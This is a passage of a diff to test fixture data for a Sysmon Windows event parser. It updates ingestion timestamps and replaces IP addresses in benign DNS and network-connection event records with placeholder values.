ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802700200Z'/\u003e\u003cEventRecordID\u003e120\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.333\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.usertrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7209,17 +7126,17 @@ "type": "CNAME" }, { - "data": "23.50.53.179", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.176", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -7236,14 +7153,13 @@ "isrg.trustid.ocsp.identrust.com" ], "ip": [ - "23.50.53.179", - "23.50.53.176" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313826402Z", + "ingested": "2021-12-09T13:49:44.739418600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:23.50.53.179;::ffff:23.50.53.176;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802715400Z'/\u003e\u003cEventRecordID\u003e121\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.343\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eisrg.trustid.ocsp.identrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 isrg.trustid.ocsp.identrust.com.edgesuite.net;type: 5 a279.dscq.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7307,12 +7223,12 @@ "type": "CNAME" }, { - "data": "172.217.6.198", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "network": { @@ -7328,13 +7244,13 @@ "ad.doubleclick.net" ], "ip": [ - "172.217.6.198" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313827600Z", + "ingested": "2021-12-09T13:49:44.739424500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:172.217.6.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802729100Z'/\u003e\u003cEventRecordID\u003e122\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.391\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ead.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dart.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7385,7 +7301,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313828854Z", + "ingested": "2021-12-09T13:49:44.739430400Z", "code": "5", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e5\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e5\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.981137800Z'/\u003e\u003cEventRecordID\u003e6\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:38.981\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-cdf4-5c8f-0000-0010071e2a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4648\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Users\\vagrant\\Downloads\\Sysmon.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7449,11 +7365,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -7461,7 +7377,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -7469,7 +7385,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -7477,7 +7393,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -7485,21 +7401,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -7515,22 +7431,22 @@ "ocsp.sectigo.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313830187Z", + "ingested": "2021-12-09T13:49:44.739438200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802739000Z'/\u003e\u003cEventRecordID\u003e123\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.393\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sectigo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -7628,7 +7544,7 @@ "level": "information" }, "event": { - "ingested": "2021-10-14T04:10:32.313831440Z", + "ingested": "2021-12-09T13:49:44.739444700Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:39.012744700Z'/\u003e\u003cEventRecordID\u003e7\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:39.012\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce03-5c8f-0000-0010e9462a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4508\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\WmiPrvSE.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eWMI Provider Host\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=5A4C0E82FF95C9FB762D46A696EF9F1B68001C21\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -7678,15 +7594,15 @@ }, "destination": { "port": 53, - "ip": "a00:203:3000:3000:3000:3000:3000:3300" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 62141, - "ip": "a00:20f:0:0:18a2:6e00:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "domain", - "community_id": "1:EQDBfI6vAylArTBQHY8kNmaweOA=", + "community_id": "1:o5sHG56d/GR7mu8ASz0uSsv7uF0=", "transport": "udp", "type": "ipv6", "direction": "egress" @@ -7700,14 +7616,13 @@ "NETWORK SERVICE" ], "ip": [ - "a00:20f:0:0:18a2:6e00:e0:ffff", - "a00:203:3000:3000:3000:3000:3000:3300" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313832814Z", + "ingested": "2021-12-09T13:49:44.739450500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea00:20f:0:0:18a2:6e00:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ea00:203:3000:3000:3000:3000:3000:3300\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e8\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:47.847\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e62141\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e53\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003edomain\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.089Z", @@ -7785,7 +7700,7 @@ ] }, "event": { - "ingested": "2021-10-14T04:10:32.313834119Z", + "ingested": "2021-12-09T13:49:44.739456400Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.089723100Z'/\u003e\u003cEventRecordID\u003e9\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 